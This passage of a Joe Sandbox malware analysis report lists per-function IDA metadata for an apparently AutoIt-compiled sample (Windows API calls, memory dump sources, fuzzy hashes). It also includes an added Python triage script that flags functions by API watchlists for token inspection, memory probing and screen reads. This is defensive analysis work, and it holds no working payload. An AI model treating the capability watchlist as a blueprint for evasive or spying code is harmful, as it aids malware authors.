• GetWindowDC.USER32(?,00000000), ref: 00E5DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00E5DE38
• GetPixel.GDI32(00000000,?,00000000), ref: 00E5DE51
• GetPixel.GDI32(00000000,00000000,?), ref: 00E5DE6A
• GetPixel.GDI32(00000000,?,?), ref: 00E5DE8A
• ReleaseDC.USER32(?,00000000), ref: 00E5DE95
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 97f1eee6dc02b0ef0ab46fb0edf9055c2a094de89b1b6bbf37ba6f70b7f4e828
• Instruction ID: 573187ea466039b5d1852c8d1be3530d6ff0f7256707e4f910c3265d657cf169
• Opcode Fuzzy Hash: 97f1eee6dc02b0ef0ab46fb0edf9055c2a094de89b1b6bbf37ba6f70b7f4e828
• Instruction Fuzzy Hash: 3BE06D31A08244AEDF211B65FC0DBD93B11AB1237AF04C726FA6A680E1C7F18988CB11
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: debdc57ce0eab06d3041c1d9792ece4a0e5ec313e6ca6e57802745fa94662c99
• Instruction ID: 8ea8e73d227956458d56d592e2809d44f3d29539c7df88ce86cea6805c057cef
• Opcode Fuzzy Hash: debdc57ce0eab06d3041c1d9792ece4a0e5ec313e6ca6e57802745fa94662c99
• Instruction Fuzzy Hash: ABE01AB1A04208EFDB005F71EC4866E7BA5EB4C391F52C805FD5AA7250CAB498449F60
APIs
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: f043eb968ed6f64bfaa9c329ac26f98008c93245b1e2257855117103d538d249
• Instruction ID: 91c57d09a65c954ac7596104eefedf671c572747d25ac1245f25f36daa317f2b
• Opcode Fuzzy Hash: f043eb968ed6f64bfaa9c329ac26f98008c93245b1e2257855117103d538d249
• Instruction Fuzzy Hash: 87E04FB1A04204EFDB005F71EC4C62E7BA5EB4C390F52C405FD5A97250CBB4D8048F20
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscpy
• String ID: I/$I/
• API String ID: 3048848545-2526233121
• Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
• Instruction ID: a832f2477824c1bfa49a8d6d697f9ec21c76f398cc3616d2efe84f40e495f397
• Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
• Instruction Fuzzy Hash: 4C41E871900226BACF25EF99E4419FDB7B0EF58714F54605EFA81B7191DB309E82C760
APIs
• Sleep.KERNEL32(00000000), ref: 00DFBCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 00DFBCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 2c84f3973fcba84510be2fc751c7aed84d4491f6901d504060e4839376338cd2
• Instruction ID: eb9e6e2526e73ebd31b010b7b7bbd5b9fe484a0087773230d7c659ec3228b436
• Opcode Fuzzy Hash: 2c84f3973fcba84510be2fc751c7aed84d4491f6901d504060e4839376338cd2
• Instruction Fuzzy Hash: CA5129714087489BE320AF14DC85BBFBBE8FB95354F42884EF6C8520A6DF71856C8766
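The blocks above are the Joe Sandbox IDA plugin's per-function summary: the direct API calls with their call-site addresses (a "Part of subcall function" entry marks a call reached through a callee), the memory dump the function was recovered from, and the similarity keys (API ID, String ID, API String ID, opcode and instruction fuzzy hashes). A report can carry hundreds of these, so it helps to parse them and pull out the handful worth opening first. The following is an added example written for this page, not Joe Sandbox code. The sample text is constructed in the report's layout from refs and IDs that appear on this page, and the WATCHLIST sets (GetCurrentProcess/OpenProcessToken token inspection, a GlobalMemoryStatusEx probe, GetWindowDC/GetPixel screen reads) are an analyst's assumption about what to read first, not a statement the report makes about these functions.

```python
"""Triage helper for the per-function metadata blocks Joe Sandbox prints above.
Added example for this page, not Joe Sandbox code: it parses that text layout
and groups functions by the API combinations an analyst may want to open first
in IDA. WATCHLIST is an analyst assumption, not a finding stated by the report.
"""
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

# Constructed sample in the report's layout; refs and IDs are copied from
# blocks on the page, the rest is trimmed to keep the sample short.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E1AC9D), ref: 00E1B0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00E1AC9D), ref: 00E1B0F1
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
APIs
• GetWindowDC.USER32(?,00000000), ref: 00E5DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00E5DE38
Similarity
• API String ID: 1946975507-0
APIs
• Sleep.KERNEL32(00000000), ref: 00DFBCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 00DFBCF3
Strings
Similarity
• String ID: @
• API String ID: 2783356886-2766056989
APIs
  • Part of subcall function 00DE44ED: __fread_nolock.LIBCMT ref: 00DE450B
• _wcscmp.LIBCMT ref: 00E2C65D
• _wcscmp.LIBCMT ref: 00E2C670
Similarity
• String ID: FILE
"""

HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(
    r"^•\s*(API String ID|API ID|String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")
# ref is the call-site address; via_subcall marks calls reached through a callee.
ApiCall = namedtuple("ApiCall", "name module ref via_subcall")

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def entry_ref(self):
        # Lowest direct call-site address doubles as a handle for the function.
        direct = [c.ref for c in self.calls if not c.via_subcall]
        return min(direct, key=lambda r: int(r, 16)) if direct else None

def parse_blocks(text):
    # One FunctionBlock per "APIs" header; the other headers only switch section.
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, section = FunctionBlock(), "APIs"
            blocks.append(cur)
        elif line in HEADERS:
            section = line
        elif cur is not None and section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.calls.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"] is not None))
        elif cur is not None:
            m = FIELD_RE.match(line)
            if m:
                cur.fields[m.group(1)] = m.group(2).strip()
    return blocks

# Analyst assumption: a hit means the function touches the capability, nothing more.
WATCHLIST = {
    "token-inspection": {"GetCurrentProcess", "OpenProcessToken"},
    "memory-size-probe": {"GlobalMemoryStatusEx"},
    "screen-pixel-read": {"GetWindowDC", "GetPixel"},
}

def tag_blocks(blocks, watchlist=WATCHLIST):
    # Map each tag to the entry refs of functions that call every API in its set.
    hits = defaultdict(list)
    for b in blocks:
        names = {c.name for c in b.calls}
        for tag, required in watchlist.items():
            if required <= names:
                hits[tag].append(b.entry_ref())
    return dict(hits)

if __name__ == "__main__":
    print(tag_blocks(parse_blocks(SAMPLE)))
```

Run against the full report text the tags give you a short list of entry addresses to jump to in the IDA snapshot. Since the page identifies the binary as a compiled AutoIt script, many of these functions are AutoIt runtime code (GUI painting, memory statistics) rather than the payload, so a hit is a pointer to read, not a verdict; the API String ID field is useful for the same reason, because two blocks with the same value (as with the two CapsDesktopDeviceReleaseWindow functions above) have the same API and string profile and only need to be read once.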
APIs
  • Part of subcall function 00DE44ED: __fread_nolock.LIBCMT ref: 00DE450B
• _wcscmp.LIBCMT ref: 00E2C65D
• _wcscmp.LIBCMT ref: 00E2C670
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 9c963d540ed30c4f8c832cc03f5c315f8f4e377623c701b459a272cb680925e7
• Instruction ID: 5cbffc1fbf6542f3de3ff03b36b645e06776d83128a57c524ed25195ba3900f4
• Opcode Fuzzy Hash: 9c963d540ed30c4f8c832cc03f5c315f8f4e377623c701b459a272cb680925e7
• Instruction Fuzzy Hash: E041B372B0025ABADF20ABA4DC41FEF77B9EF49714F101469F605FB181D6B19A048B61
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00E4A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E4A86F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 6de31b18afc0628867f6a090d9db661becfd5ff77219695c35df77b72568a0a3
• Instruction ID: 8a14d38278cb7b299dca6736b07b50f41f433cce7f5828cf434ec92ab0993490
• Opcode Fuzzy Hash: 6de31b18afc0628867f6a090d9db661becfd5ff77219695c35df77b72568a0a3
• Instruction Fuzzy Hash: 35411675E402099FDB14CF69D884BDA7BB9FB08314F18106AE905EB381D770A946CFA1
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00E4980E
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E4984A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                  • Opcode ID: 7ae156656700ceb6af4638a293213717895c008b7ac5646a9ca6c58167ed1938
                                                                                                                  • Instruction ID: f4bc1acdde91f0963ed292e558a9e0dde565e890018556a79d92bc5e2b26ff5b
                                                                                                                  • Opcode Fuzzy Hash: 7ae156656700ceb6af4638a293213717895c008b7ac5646a9ca6c58167ed1938
                                                                                                                  • Instruction Fuzzy Hash: E631AF71510204AEEB149F38DC81BFB73A9FF9D764F009619F9A9E7191CA71AC81C760
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E251C6
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E25201
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: e7cdc3662c3ee6510c00b1e3d9f28329706f0eba7e5841c4d9d883732e72cb5a
                                                                                                                  • Instruction ID: 5dfb54551d652b2c3ce9ef330a11cbc31ac609cc35c091f3c670b8b4de5d5444
                                                                                                                  • Opcode Fuzzy Hash: e7cdc3662c3ee6510c00b1e3d9f28329706f0eba7e5841c4d9d883732e72cb5a
                                                                                                                  • Instruction Fuzzy Hash: B1319333600724EBEB28CF99EA45BAEBBF4EF45354F146019E985B61F0E7709944CB20
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __snwprintf
                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                  • API String ID: 2391506597-2584243854
                                                                                                                  • Opcode ID: 0367942c5517c228aa596914069b8aee5665a51213ea9688505c065ce4eac3f1
                                                                                                                  • Instruction ID: d6989d5c762a2f0622f799ebcffc746e950a9f415bf85e8be0acf0f91750ff3a
                                                                                                                  • Opcode Fuzzy Hash: 0367942c5517c228aa596914069b8aee5665a51213ea9688505c065ce4eac3f1
                                                                                                                  • Instruction Fuzzy Hash: 17218971600218BBCF11EFA5C882AEE77B4EF44784F1094A9F505BB195DB70EA45CBB1
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E4945C
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E49467
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  • Opcode ID: 52ee2ab7d7ffa9143876ada2534b4fbad9b1d9c1f8780c38c62d90ee66c5251f
                                                                                                                  • Instruction ID: 7a3e5686d591376e7a8b1ca1168c73e627a7b7bb05b9a3cfd168006f309cdefe
                                                                                                                  • Opcode Fuzzy Hash: 52ee2ab7d7ffa9143876ada2534b4fbad9b1d9c1f8780c38c62d90ee66c5251f
                                                                                                                  • Instruction Fuzzy Hash: D911B2B13002086FEF219E55ECC0EBB376FEB993A8F115125F929B72A1D6719C528760
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • GetActiveWindow.USER32 ref: 00E4DA7B
                                                                                                                  • EnumChildWindows.USER32(?,00E4D75F,00000000), ref: 00E4DAF5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                  • String ID: T1
                                                                                                                  • API String ID: 3814560230-924183305
                                                                                                                  • Opcode ID: ec91a0350b0088f9f14fa7e3d1c783be5f039eacaf3f03d45b07a0c16220569f
                                                                                                                  • Instruction ID: b23235ccb501f605cbdc20c7542c2617f74f5893e22e103a9bc98db287b6d507
                                                                                                                  • Opcode Fuzzy Hash: ec91a0350b0088f9f14fa7e3d1c783be5f039eacaf3f03d45b07a0c16220569f
                                                                                                                  • Instruction Fuzzy Hash: C9216935608200DFC714DF29EC50AA677E5EF8A320F291259F96AE73E0C730B804CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
                                                                                                                    • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
                                                                                                                    • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00E49968
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00E49982
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                  • Opcode ID: 0077d70d5815a8922b339c7466363ac79a9d45f8392b4113bb8068a92411cc28
                                                                                                                  • Instruction ID: 885927ae68461a6dfc56bbd75ffb36d856f7caa491acdfd0b5f0783ac8285019
                                                                                                                  • Opcode Fuzzy Hash: 0077d70d5815a8922b339c7466363ac79a9d45f8392b4113bb8068a92411cc28
                                                                                                                  • Instruction Fuzzy Hash: B211597262020AAFDB04DFB8DC45AEB7BA8FB48354F015618FA56E2251D774E810DB60
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00E49699
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E496A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: 9505c578d59d3664fe5710c2902eae9f83286fafc1e989ed210cb471c79de8cd
                                                                                                                  • Instruction ID: f4dc9893887cd96649b6872625fd89ae5644f8291bdc4afedab058e9e1edfd8f
                                                                                                                  • Opcode Fuzzy Hash: 9505c578d59d3664fe5710c2902eae9f83286fafc1e989ed210cb471c79de8cd
